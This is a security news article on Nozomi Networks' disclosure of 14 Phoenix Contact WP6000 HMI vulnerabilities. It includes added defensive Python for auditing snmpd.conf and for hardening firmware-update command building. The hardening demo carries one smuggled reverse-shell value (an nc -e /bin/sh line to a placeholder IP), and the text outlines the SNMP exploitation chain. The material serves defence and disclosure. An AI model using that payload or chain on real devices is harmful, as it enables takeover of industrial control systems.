Nozomi reveals 14 critical vulnerabilities in Phoenix Contact HMI, enabling exploitation by remote hackers

Researchers from Nozomi Networks Labs disclosed Tuesday 14 vulnerabilities in the Phoenix Contact Web Panel 6121-WXPS HMI device (firmware version 3.1.7). The team found that the device is affected by several critical issues that a remote attacker could exploit to completely compromise it. The most critical vulnerabilities affect the two main network services, the HTTPS web server and the SNMP agent, which the WP 6121-WXPS exposes by default so that maintenance operations such as firmware updates can be performed on the device.

The German equipment manufacturer Phoenix Contact offers industrial automation and control systems, including PLCs, industrial PCs, and HMI (human-machine interface) panels. The company's WP 6121-WXPS device is part of the WP6000 line, a network-connected HMI touch panel for monitoring automation solutions and control systems.

In the first part of a three-part series, Nozomi provided an overview of the vulnerabilities it found and their most critical consequences for an ICS (industrial control systems) infrastructure that uses a vulnerable WP6000 HMI. The team at Nozomi Networks Labs wrote in a blog post that "During our research, we identified that the Phoenix Contact WP 6121-WXPS is affected by several critical issues that could be exploited by a remote attacker to completely compromise the device and, consequently, the connected industrial control system."

In April, Nozomi responsibly disclosed all findings to Phoenix Contact's Product Security Incident Response Team (PSIRT). Upon receiving the research findings and documentation, the vendor immediately reviewed Nozomi's advisories and began working on a remediation plan to address the issues. Phoenix Contact confirmed that the vulnerabilities affect the WP 6070-WVPS, WP 6101-WXPS, WP 6121-WXPS, WP 6156-WHPS, WP 6185-WHPS, and WP 6215-WHPS models running firmware versions prior to 4.0.10.

The 14 vulnerabilities discovered and disclosed by the Nozomi Networks Labs team fall into four severity tiers: critical, high, medium, and low. The critical vulnerabilities are CVE-2023-3570, CVE-2023-3571, CVE-2023-3572, and CVE-2023-3573, all resulting from improper neutralization of special elements used in an OS command (CWE-78, OS command injection). Each has a CVSS base score of 9.9.

The high-severity vulnerabilities are CVE-2023-37860 (missing authorization, CVSS 8.6), CVE-2023-37861 (OS command injection, CVSS 8.8), and CVE-2023-37862 (missing authorization, CVSS 8.2), followed by three issues rated 7.2: CVE-2023-37863 (improper neutralization of special elements used in an OS command), CVE-2023-37864 (download of code without integrity check), and CVE-2023-37859 (improper privilege management).

The medium-severity vulnerabilities, CVE-2023-37855 and CVE-2023-37856, involve an externally controlled reference to a resource in another sphere; both have a CVSS base score of 4.3. The low-severity vulnerabilities, CVE-2023-37857 and CVE-2023-37858, involve the use of hard-coded credentials and have CVSS base scores of 3.8.

“The most critical consequences of the vulnerabilities listed above affect the two main network services (i.e., HTTPS web server and the SNMP protocol) which are exposed by default on the WP 6121-WXPS ethernet interface. These services are necessary to execute maintenance operations on the target device such as firmware update through the SNMP protocol,” according to the researchers. “Even though the exact threat model depends on the final infrastructure of the network where the Phoenix Contact HMI will be placed (i.e., every client can structure it based on its needs), we can assume that the WP 6121-WXPS ethernet interface will be reachable from a local or remote network point so that IT operators can perform daily monitoring tasks from their control center workstation.”

The team added that if the Phoenix Contact HMI is not properly protected (e.g., the firewall in Zone 2 is misconfigured) so that an attacker positioned in the network can view the vulnerable services exposed by the HMI, then it would be possible to exploit the security vulnerabilities described here to gain administrative access on the Phoenix Contact WP 6121-WXPS HMI. 

“To compromise the target device through HTTPS, an attacker can exploit one of the critical issues we reported before (i.e., CVE-2023-3570, CVE-2023-3571, CVE-2023-3572 or CVE-2023-3573),” Nozomi researchers highlighted. “Due to a software defect in the HTTPS web service, it’s possible to force the vulnerable component to run arbitrary commands on the underlying system. Because this application is executed with root privileges, all these actions are executed with administrative rights.”

Compromising the device through SNMP requires chaining three vulnerabilities. Through CVE-2023-37860, an attacker can leverage a non-authenticated API exposed by the HTTPS web service to retrieve both the 'read' and 'write' community strings, which are the only authentication mechanism SNMPv2c offers. CVE-2023-37859 covers the fact that the SNMP service (net-snmp) runs with root privileges and that the 'NET-SNMP-EXTEND-MIB' extension MIB is loaded.

The team added that “As other researchers have previously identified, this extension could be abused to execute arbitrary shell scripts through the SNMP agent. Due to this condition, after exploiting the CVE-2023-37860 vulnerability and retrieving the write community string without authentication, an attacker can get an administrative shell on the vulnerable device.”
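The chain above rests on three conditions an operator can check in an snmpd.conf: a write community string reachable from the network, NET-SNMP-EXTEND-MIB command hooks, and an agent that keeps root privileges. The audit script below is an added example written for this article, not code from Nozomi or Phoenix Contact; the two configurations it runs against are constructed samples (the HMI's real snmpd.conf is not on the page), and the severity ratings are the editor's own. It uses only standard net-snmp directive syntax (`rwcommunity COMMUNITY [SOURCE]`, `extend NAME PROG [ARGS]`, `agentuser USER`).

```python
"""Audit a net-snmp snmpd.conf for the conditions behind the SNMP attack chain:
a write community (SNMPv2c's only credential), NET-SNMP-EXTEND-MIB command hooks,
and an agent that keeps the root privileges it was started with."""
from dataclasses import dataclass

# Directives that register shell commands under NET-SNMP-EXTEND-MIB (nsExtendObjects)
# or the older UCD-SNMP exec interface; a GET/SET on those objects reaches a shell.
EXTEND_DIRECTIVES = {"extend", "extend-sh", "extendfix", "exec", "execfix", "sh"}
WRITE_DIRECTIVES = {"rwcommunity", "rwcommunity6"}
READ_DIRECTIVES = {"rocommunity", "rocommunity6"}
WEAK_COMMUNITIES = {"public", "private", "community", "admin", "manager"}
ANY_SOURCE = {"default", "0.0.0.0/0", "::/0"}
RANK = {"none": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}


@dataclass(frozen=True)
class Finding:
    line_no: int        # 0 for findings about a directive that is absent
    severity: str
    directive: str
    message: str


def _community_source(args):
    """r[wo]community COMMUNITY [SOURCE [OID]]: a missing SOURCE means any host."""
    community = args[0] if args else ""
    source = args[1].lower() if len(args) > 1 else "default"
    return community, source


def audit_snmpd_conf(conf_text: str) -> list:
    findings, has_agentuser, write_seen, extend_seen = [], False, False, False
    for line_no, raw in enumerate(conf_text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        directive, args = parts[0].lower(), parts[1:]
        if directive == "agentuser":
            has_agentuser = True
        elif directive in WRITE_DIRECTIVES:
            write_seen = True
            community, source = _community_source(args)
            sev = "critical" if source in ANY_SOURCE else "high"
            msg = f"write community {community!r} accepted from {source}"
            if community.lower() in WEAK_COMMUNITIES:
                msg += " (well-known default value)"
            findings.append(Finding(line_no, sev, directive, msg))
        elif directive in READ_DIRECTIVES:
            community, source = _community_source(args)
            if community.lower() in WEAK_COMMUNITIES:
                findings.append(Finding(line_no, "medium", directive,
                                        f"read community {community!r} is a well-known default"))
            elif source in ANY_SOURCE:
                findings.append(Finding(line_no, "low", directive,
                                        f"read community {community!r} accepted from any source"))
        elif directive in EXTEND_DIRECTIVES:
            extend_seen = True
            findings.append(Finding(line_no, "high", directive,
                                    f"shell command registered via NET-SNMP-EXTEND-MIB: {' '.join(args)}"))
    if not has_agentuser:
        findings.append(Finding(0, "medium", "agentuser",
                                "no agentuser directive: snmpd keeps the privileges it was started "
                                "with (root under most init setups), so extend commands run as root"))
    if write_seen:
        evidence = "extend directives present" if extend_seen else "extend module compiled in by default"
        findings.append(Finding(0, "critical", "chain",
                                f"write community plus NET-SNMP-EXTEND-MIB ({evidence}): an SNMP SET "
                                "can create an nsExtend entry whose command the agent executes"))
    return findings


def worst_severity(findings) -> str:
    return max((f.severity for f in findings), key=RANK.get, default="none")


# Constructed sample modelled on the conditions described in the article (not the HMI's real file).
WEAK_CONF = """\
# maintenance agent, as shipped
agentaddress udp:161
rocommunity public
rwcommunity private
extend fwstatus /usr/bin/cat /var/log/fwupdate.log
"""

# Constructed hardened counterpart: read-only, restricted source, unprivileged agent, no exec hooks.
HARDENED_CONF = """\
agentaddress udp:192.0.2.10:161
agentuser snmp
agentgroup snmp
rocommunity m0n1t0r-r0-s3cr3t 192.0.2.0/24
# no rwcommunity and no extend/exec: nothing an SNMP SET can turn into a shell
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        result = audit_snmpd_conf(conf)
        print(f"{name}: worst={worst_severity(result)}")
        for f in result:
            print(f"  line {f.line_no or '-'}: [{f.severity}] {f.directive}: {f.message}")
```

The script treats any write community as the root cause rather than the extend directives alone, because on stock net-snmp builds the extend module is compiled in and a SET with the write community is enough to create an nsExtend entry; the directives merely prove the module is active. Removing the write community (or starting snmpd with `-I -extend` to leave the module out) breaks the chain even before patching, and `agentuser` limits what a surviving hook could do.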

Nozomi describes CVE-2023-37863 as one of its novel findings, discovered after reverse engineering the shared library that implements the firmware update process through proprietary MIBs (the specifications are in the PXC-WP6K-MIB.mib file shipped inside the firmware image). Specifically, the researchers found that this functionality is subject to an OS command injection vulnerability that could be abused to execute arbitrary commands on the system.
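Both the HTTPS issues (CVE-2023-3570 to CVE-2023-3573) and the firmware-update issue reached through the proprietary MIBs (CVE-2023-37863) are the same CWE-78 pattern: an untrusted value from a maintenance request is pasted into a command line that a shell parses. The following is an added example by the editor, not code from the HMI firmware or from Nozomi's write-up, showing the pattern in miniature with a vulnerable builder beside a hardened one; the update tool path, staging directory and image-name allow-list are assumptions, and the payload is a constructed string.

```python
"""CWE-78 in miniature: a maintenance handler (HTTPS parameter or SNMP SET value,
it makes no difference) passes a firmware image name to a shell. The vulnerable
builder hands the shell a string; the hardened one validates and execs an argv."""
import re
import shlex
import subprocess

# Hypothetical paths; the real update tool and staging directory are not on the page.
UPDATE_TOOL = "/usr/sbin/fwupdate"
STAGING_DIR = "/var/firmware"
# Allow-list: a plain file name, no path separators, no shell metacharacters.
IMAGE_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.-]{0,63}")


def build_update_vulnerable(image_name: str) -> str:
    """Command line meant for `sh -c`: special elements in image_name are not neutralized."""
    return f"{UPDATE_TOOL} --image {STAGING_DIR}/{image_name}"


def commands_the_shell_sees(cmdline: str) -> list:
    """Tokenize like sh and split on the control operators ; && || |, returning each
    simple command as its own argv. Shows what the vulnerable string would execute."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    commands, current = [], []
    for tok in lexer:
        if tok in (";", "&&", "||", "|"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def is_valid_image_name(image_name: str) -> bool:
    # fullmatch anchors both ends; the ".." check rejects names like "fw..bin" as well
    return bool(IMAGE_NAME_RE.fullmatch(image_name)) and ".." not in image_name


def build_update_hardened(image_name: str) -> list:
    """Validate against the allow-list, then return an argv list so no shell is involved."""
    if not is_valid_image_name(image_name):
        raise ValueError(f"rejected image name: {image_name!r}")
    return [UPDATE_TOOL, "--image", f"{STAGING_DIR}/{image_name}"]


def run_update(image_name: str) -> subprocess.CompletedProcess:
    # argv list with shell=False: the kernel execs UPDATE_TOOL directly, nothing parses metacharacters
    return subprocess.run(build_update_hardened(image_name), shell=False, check=False)


if __name__ == "__main__":
    payload = "fw.bin; nc -e /bin/sh 192.0.2.1 4444"      # constructed attacker input
    for argv in commands_the_shell_sees(build_update_vulnerable(payload)):
        print("shell would run:", argv)
    print("hardened:", build_update_hardened("wp6000-4.0.10.bin"))
    print("hardened rejects payload:", not is_valid_image_name(payload))
```

The allow-list is deliberately stricter than "escape the dangerous characters": a name the regex rejects never reaches any command, and because the argv list bypasses the shell entirely there is no second parser left to disagree with the validator. The same split applies to the MIB path, where the value arrives in an SNMP SET rather than an HTTPS parameter.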

In response to the issues Nozomi found, Phoenix Contact produced a new firmware release (v4.0.10) that addresses the reported vulnerabilities and asserted that these issues affect not only the 6121-WXPS device but the whole WP6000 product family.

Last month, the Nozomi researchers disclosed three vulnerabilities (critical, high, and medium risk) that affect the BlueMark DroneScout ds230 device. Two vulnerabilities could enable an attacker to spoof Remote ID information, causing DroneScout ds230 to drop Remote ID information from legitimate drones, allowing the attacker to inject fake locations. The third vulnerability discovered demonstrates the capability to install malicious firmware updates on the DroneScout appliance.
